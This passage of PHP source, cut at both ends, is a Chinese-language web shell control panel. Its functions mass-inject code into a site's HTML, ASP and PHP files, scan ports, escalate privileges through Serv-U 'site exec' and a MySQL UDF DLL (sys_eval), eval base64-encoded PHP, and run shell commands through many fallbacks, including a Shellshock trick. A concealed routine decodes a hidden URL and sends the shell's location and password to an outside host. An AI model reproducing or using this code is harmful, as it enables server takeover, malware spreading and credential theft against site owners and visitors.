上传到路径: ","51"); print<< function addTank(){ var k=0; k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) newcell=newRow.insertCell() newcell.innerHTML=" " } function delTank() { if(tank.rows.length==1) return; var checkit = false; for (var i=0;i

请选择要上传的文件:
END; html_n('
'); if($_POST['upfiles']){ foreach ($_FILES["upfile"]["error"] as $key => $error){ if ($error == UPLOAD_ERR_OK){ $tmp_name = $_FILES["upfile"]["tmp_name"][$key]; $name = $_FILES["upfile"]["name"][$key]; $uploadfile = str_path($_POST['uppath'].'/'.$name); $upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3]; echo '

'.$upload; } } } html_n(''); break; case "guama": $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; html_n('
文件类型请用"|"隔开,也可以是指定文件名.

'); html_input("text","path",$patht,"路径范围","45"); html_input("checkbox","pass","","使用目录遍历","",true); html_input("text","type",$typet,"

文件类型","60"); html_text("code","67","5",$codet); html_n('

'); html_radio("批量挂马","批量清马","guama","qingma"); html_input("submit","passreturn","开始"); html_n('
目标文件:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($patht,$codet,$_POST['return'],$bool,$typet); } break; case "tihuan": html_n('
此功能可批量替换文件内容,请小心使用.

'); html_input("text","path",root_dir,"路径范围","45"); html_input("checkbox","pass","","使用目录遍历","",true); html_text("newcode","67","5",$_POST['newcode']); html_n('

替换为'); html_text("oldcode","67","5",$_POST['oldcode']); html_input("submit","passreturn","替换","

"); html_n('
目标文件:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('
此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.
当服务器文件太多时,会影响执行速度,不建议使用目录遍历.

'); html_input("text","path",root_dir,"路径名","45"); html_input("checkbox","pass","","使用目录遍历","",true); html_input("text","code",$_POST['code'],"

关键字","40"); html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); html_n('

'); html_radio("搜索文件名","搜索包含文字","scanfile","scancode"); html_input("submit","passreturn","搜索"); html_n('
找到文件:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool); } break; case "scanphp": html_n('
原理是根据特征码定义的,请查看代码判断后再进行删除.

'); html_input("text","path",root_dir,"查找范围","40"); html_input("checkbox","pass","","使用目录遍历

脚本类型","",true); html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP")); html_input("submit","passreturn","查找","

"); html_n('
找到文件:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool); } break; case "port": $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873'; print<<
扫描IP
端口号
END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) { echo '
'; $ports = explode('|', $_POST['port']); for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2); echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
'; ob_flush(); flush(); } echo '
'; } break; case "getcode": if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

获取 URL 内容失败

";exit;} print<<
在线代理

  • 用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.
  • 用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.
  • 用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}
URL:
END; break; case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print<<[执行命令] [添加用户]
ServU端口
ServU用户
ServU密码
END; if($_GET['o'] == 'adduser') { print<<帐号 密码 目录 END; } else { print<<提权命令
END; } echo '
'; if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) { echo '
'; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10); $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10); $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; @fclose($exp); } @fclose($sock); echo '
'; } break; case "phpcode": $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();"; if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode)); echo '
不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道(小小细节,注定成就)



'; if(!empty($_POST['phpcode'])){ echo "

"; eval(stripslashes(base64_decode($_POST['phpcode']))); } html_n('
'); break; case "myexp": $MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.'; $info = '命令回显'; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { @$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost.':'.$mport,$muser,$mpass); if($conn) { @mysql_select_db($mdata); /*************************************/ $str=mysql_get_server_info(); //echo 'MYSQL版本:'.$str." "; if($str[2]>=1){ $sql="SHOW VARIABLES LIKE '%plugin_dir%'"; $row=mysql_query($sql,$conn); $rows=mysql_fetch_row($row); $pa=str_replace('\\','/',$rows[1]); $path=$pa.$BH; }else{ $path='C:/WINDOWS/'.$BH; } //$mpath=$path; if(!empty($mpath)) { $mpath=$mpath; }else{ $mpath=$path; } /*************************************/ if((!empty($_POST['outdll'])) && (!empty($mpath))) { $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; if(@mysql_query($query,$conn)) { $shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode(); $query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));"; if(@mysql_query($query,$conn)) { $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';'; if(@mysql_query($query,$conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败'.mysql_error(); } else $MSG_BOX = '导出DLL文件失败'.mysql_error(); } else $MSG_BOX = '写入临时表失败'; @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn); } else $MSG_BOX = '创建临时表失败'; } if(!empty($_POST['runcmd'])) { $query = 'select sys_eval("'.$sqlcmd.'");'; $result = @mysql_query($query,$conn); if($result) { $k = 0; $info = NULL; while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;} $info = $infotmp; $MSG_BOX = '执行成功'; } else $MSG_BOX = '执行失败'; } } else $MSG_BOX = '连接MYSQL失败'; } print<<
{$MSG_BOX}
地址 端口 用户 密码 库名
加载路径(自动获取) 64位MYSQL
支持高版本MYSQL


END; break; case "mysql_exec": if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) { if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass'])) { $cookietime = time() + 24 * 3600; setcookie('m_eanverhost',$_POST['mhost'],$cookietime); setcookie('m_eanverport',$_POST['mport'],$cookietime); setcookie('m_eanveruser',$_POST['muser'],$cookietime); setcookie('m_eanverpass',$_POST['mpass'],$cookietime); die('正在登陆,请稍候...'); } } print<<
地址
端口
用户
密码
END; break; case "mysql_msg": $conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']); if($conn) { print<< function Delok(msg,gourl) { smsg = "确定要删除[" + unescape(msg) + "]吗?"; if(confirm(smsg)){window.location = gourl;} window.location = gourl; } function Createok(ac) { if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);'; if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; return false; } END; html_base(); print<< END; $BOOL = false; $MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].'      地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].'      版本:'; $k = 0; $result = @mysql_query('select version();',$conn); while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} echo '
数据库:'; $result = mysql_query("SHOW DATABASES",$conn); while($db = mysql_fetch_array($result)){echo '  ['.$db['Database'].']';} echo '
'; if(isset($_GET['db'])) { mysql_select_db($_GET['db'],$conn); $_POST['nsql']=base64_decode($_POST['nsql']); if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();} if(is_array($_POST['insql'])) { $query = 'INSERT INTO '.$_GET['table'].' ('; foreach($_POST['insql'] as $var => $key) { $querya .= $var.','; $queryb .= '\''.addslashes($key).'\','; } $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; $MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error(); } if(is_array($_POST['upsql'])) { $query = 'UPDATE '.$_GET['table'].' SET '; foreach($_POST['upsql'] as $var => $key) { $queryb .= $var.'=\''.addslashes($key).'\','; } $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; $MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error(); } if(isset($_GET['del'])) { $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn); $good = mysql_fetch_assoc($result); $query = 'DELETE FROM '.$_GET['table'].' WHERE '; foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} $where = $query.substr($queryc, 0, -4).';'; $MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error(); } $action = '?eanver=mysql_msg&db='.$_GET['db']; if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();} if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; echo '
'; echo ' '; echo ''; echo ' '; echo ' '; echo '
'; echo '
'.$MSG_BOX.'
'.$_GET['db'].' ---> '; if(isset($_GET['table'])) { echo ''.$_GET['table'].' '; echo '[插入]
'; if(isset($_GET['edit'])) { if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; echo '
'; $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn); $good = mysql_fetch_assoc($result); $u = 0; foreach($good as $var => $key) { $queryc .= $var.'=\''.$key.'\' AND '; $type = @mysql_field_type($result, $u); $len = @mysql_field_len($result, $u); echo '
'.$var.' '.$type.'('.$len.')
'; $u++; } $where = 'WHERE '.substr($queryc, 0, -4); echo ''; echo '
'; } else { $query = 'SHOW COLUMNS FROM '.$_GET['table']; $result = mysql_query($query,$conn); $fields = array(); $pagesize=20; $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn)); $numrows=$row_num; $pages=intval($numrows/$pagesize); if ($numrows%$pagesize) $pages++; $offset=$pagesize*($page - 1); $page=$_GET['p']; if(!$page) $page=1; if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; echo ''; echo ''; while($row = @mysql_fetch_assoc($result)) { array_push($fields,$row['Field']); echo ''; } echo ''; if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;'; $result = mysql_query($query,$conn); $v = $p; while($text = @mysql_fetch_assoc($result)) { echo ''; foreach($fields as $row){echo '';} echo ''."\r\n";$v++; } echo '
操作'.$row['Field'].'
修改 '; echo ' 删除 '.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'
'; $pagep=$page-1; $pagen=$page+1; echo "共有 ".$row_num." 条记录 "; if($pagep>0) $pagenav.=" 首页 上一页 "; else $pagenav.=" 上一页 "; if($pagen<=$pages) $pagenav.=" 下一页 尾页"; else $pagenav.=" 下一页 "; $pagenav.=" 第 [".$page."/".$pages."] 页 跳到页"; echo $pagenav; echo '
'; } } elseif(isset($_GET['insert'])) { echo ''.$_GET['insert'].''; $result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn); $fieldnum = @mysql_num_fields($result); echo '
'; for($i = 0;$i < $fieldnum;$i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); echo '
'.$name.' '.$type.'('.$len.')
'; } echo '
'; } else { $query = 'SHOW TABLE STATUS'; $status = @mysql_query($query,$conn); while($statu = @mysql_fetch_array($status)) { $statusize[] = $statu['Data_length']; $statucoll[] = $statu['Collation']; } $query = 'SHOW TABLES FROM '.$_GET['db'].';'; echo ''; echo ''; echo ''; echo ''; echo ''; $result = @mysql_query($query,$conn); $k = 0; while($table = mysql_fetch_row($result)) { $charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_')); echo ''; echo ''; echo ''."\r\n"; $k++; } echo '
表名 操作 字符集 大小
'.$table[0].' 插入 删除 '.$statucoll[$k].''.File_Size($statusize[$k]).'
'; } } } else die('连接MYSQL失败,请重新登陆.'); if(!$BOOL and addslashes($query)!='') echo ''; break; default: html_main($path,$shellname); break; } css_foot(); /*---doing---*/ function do_write($file,$t,$text) { $key = true; $handle = @fopen($file,$t); if(!@fwrite($handle,$text)) { @chmod($file,0666); $key = @fwrite($handle,$text) ? true : false; } @fclose($handle); return $key; } function do_show($filepath){ $show = array(); $dir = dir($filepath); while($file = $dir->read()){ if($file == '.' or $file == '..') continue; $files = str_path($filepath.'/'.$file); $show[] = $files; } $dir->close(); return $show; } function do_deltree($deldir){ $showfile = do_show($deldir); foreach($showfile as $del){ if(is_dir($del)){ if(!do_deltree($del)) return false; }elseif(!is_dir($del)){ @chmod($del,0777); if(!@unlink($del)) return false; } } @chmod($deldir,0777); if(!@rmdir($deldir)) return false; return true; } function do_showsql($query,$conn){ $result = @mysql_query($query,$conn); html_n('

'); } function hmlogin($xiao=1){ $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = postpass; if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "";}else{geturl();}} } function do_down($fd){ if(!@file_exists($fd)) msg('下载文件不存在'); $fileinfo = pathinfo($fd); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($fd)); @readfile($fd); exit; } function do_download($filecode,$file){ header("Content-type: application/unknown"); header('Accept-Ranges: bytes'); header("Content-length: ".strlen($filecode)); header("Content-disposition: attachment; filename=".$file.";"); echo $filecode; exit; } function TestUtf8($text) {if(strlen($text) < 3) return false; $lastch = 0; $begin = 0; $BOM = true; $BOMchs = array(0xEF, 0xBB, 0xBF); $good = 0; $bad = 0; $notAscii = 0; for($i=0; $i < strlen($text); $i++) {$ch = ord($text[$i]); if($begin < 3) { $BOM = ($BOMchs[$begin]==$ch); $begin += 1; continue; } if($begin==4 && $BOM) break; if($ch >= 0x80 ) $notAscii++; if( ($ch&0xC0) == 0x80 ) {if( ($lastch&0xC0) == 0xC0 ) {$good += 1;} else if( ($lastch&0x80) == 0 ) {$bad += 1; }} else if( ($lastch&0xC0) == 0xC0 ) {$bad += 1;} $lastch = $ch;} if($begin == 4 && $BOM) {return 2;} else if($notAscii==0) {return 1;} else if ($good >= $bad ) {return 2;} else {return 0;}} function File_Str($string) { return str_replace('//','/',str_replace('\\','/',$string)); } function File_Write($filename,$filecode,$filemode) { $key = true; $handle = @fopen($filename,$filemode); if(!@fwrite($handle,$filecode)) { @chmod($filename,0666); $key = @fwrite($handle,$filecode) ? true : false; } @fclose($handle); return $key; } function Exec_Run($cmd) { $res = ''; if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();} elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);} elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";} return $res; } function File_Mode() { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } function GetFileOwner($File) { if(PATH_SEPARATOR==':'){ if(function_exists('posix_getpwuid')) { $File = posix_getpwuid(fileowner($File)); } return $File['name']; } } function GetFileGroup($File) { if(PATH_SEPARATOR==':'){ if(function_exists('posix_getgrgid')) { $File = posix_getgrgid(filegroup($File)); } return $File['name']; } } function File_Size($size) { $kb = 1024; $mb = 1024 * $kb; $gb = 1024 * $mb; $tb = 1024 * $gb; if($size < $kb) { return $size." B"; } else if($size < $mb) { return round($size/$kb,2)." K"; } else if($size < $gb) { return round($size/$mb,2)." M"; } else if($size < $tb) { return round($size/$gb,2)." G"; } else { return round($size/$tb,2)." T"; } } function File_Read($filename) { $handle = @fopen($filename,"rb"); $filecode = @fread($handle,@filesize($filename)); @fclose($handle); return $filecode; } function array_iconv($data, $output = 'utf-8') { $encode_arr = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP'); $encoded = mb_detect_encoding($data, $encode_arr); if (!is_array($data)) { return mb_convert_encoding($data, $output, $encoded); } else { foreach ($data as $key=>$val) { $key = array_iconv($key, $output); if(is_array($val)) { $data[$key] = array_iconv($val, $output); } else { $data[$key] = mb_convert_encoding($data, $output, $encoded); } } return $data; } } function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}} function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";} function do_phpfun($cmd,$fun) { $res = ''; switch($fun){ case "exec": @exec($cmd,$res); $res = join("\n",$res); break; case "shell_exec": $res = @shell_exec($cmd); break; case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break; case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break; case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break; } return $res; } if(isset($_GET['login'])=='geturl'){ @set_time_limit(10); $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = postpass; $copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA'); $url=$copyurl.$serveru.'&passwd='.$serverp; $url=urldecode($url); GetHtml($url); } function geturl(){ @set_time_limit(10); $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = postpass; $copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA'); $url=$copyurl.$serveru.'&passwd='.$serverp; $url=urldecode($url); GetHtml($url); } function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){ $show = do_show($dir); foreach($show as $files){ if(is_dir($files) && $bool){ do_passreturn($files,$code,$type,$bool,$filetype,$shell); }else{ if($files == $shell) continue; switch($type){ case "guama": if(debug($files,$filetype)){ do_write($files,"ab","\n".$code) ? html_n("成功--> $files
") : html_n("失败--> $files
"); } break; case "qingma": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ $newcode = str_replace($code,'',$filecode); do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
"); } break; case "tihuan": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ $newcode = str_replace($code,$filetype,$filecode); do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
"); } break; case "scanfile": $file = explode('/',$files); if(stristr($file[count($file)-1],$code)){ html_a("?eanver=editr&p=$files",$files); echo '
'; } break; case "scancode": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ html_a("?eanver=editr&p=$files",$files); echo '
'; } break; case "scanphp": $fileinfo = pathinfo($files); if($fileinfo['extension'] == $code){ $filecode = @file_get_contents($files); if(muma($filecode,$code)){ html_a("?eanver=editr&p=".urlencode($files),"编辑"); html_a("?eanver=del&p=".urlencode($files),"删除"); echo $files.'
'; } } break; } } } } class PHPzip{ var $file_count = 0 ; var $datastr_len = 0; var $dirstr_len = 0; var $filedata = ''; var $gzfilename; var $fp; var $dirstr=''; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function startfile($path = "web.zip"){ $this->gzfilename=$path; $mypathdir=array(); do{ $mypathdir[] = $path = dirname($path); }while($path != '.'); @end($mypathdir); do{ $path = @current($mypathdir); @mkdir($path); }while(@prev($mypathdir)); if($this->fp=@fopen($this->gzfilename,"w")){ return true; } return false; } function addfile($data, $name){ $name = str_replace('\\', '/', $name); if(strrchr($name,'/')=='/') return $this->adddir($name); $dtime = dechex($this->unix2DosTime()); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $datastr = "\x50\x4b\x03\x04"; $datastr .= "\x14\x00"; $datastr .= "\x00\x00"; $datastr .= "\x08\x00"; $datastr .= $hexdtime; $datastr .= pack('V', $crc); $datastr .= pack('V', $c_len); $datastr .= pack('V', $unc_len); $datastr .= pack('v', strlen($name)); $datastr .= pack('v', 0); $datastr .= $name; $datastr .= $zdata; $datastr .= pack('V', $crc); $datastr .= pack('V', $c_len); $datastr .= pack('V', $unc_len); fwrite($this->fp,$datastr); $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "\x50\x4b\x01\x02"; $dirstr .= "\x00\x00"; $dirstr .= "\x14\x00"; $dirstr .= "\x00\x00"; $dirstr .= "\x08\x00"; $dirstr .= $hexdtime; $dirstr .= pack('V', $crc); $dirstr .= pack('V', $c_len); $dirstr .= pack('V', $unc_len); $dirstr .= pack('v', strlen($name) ); $dirstr .= pack('v', 0 ); $dirstr .= pack('v', 0 ); $dirstr .= pack('v', 0 ); $dirstr .= pack('v', 0 ); $dirstr .= pack('V', 32 ); $dirstr .= pack('V',$this->datastr_len ); $dirstr .= $name; $this->dirstr .= $dirstr; $this -> file_count ++; $this -> dirstr_len += strlen($dirstr); $this -> datastr_len += $my_datastr_len; } function adddir($name){ $name = str_replace("\\", "/", $name); $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); fwrite($this->fp,$datastr); $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", 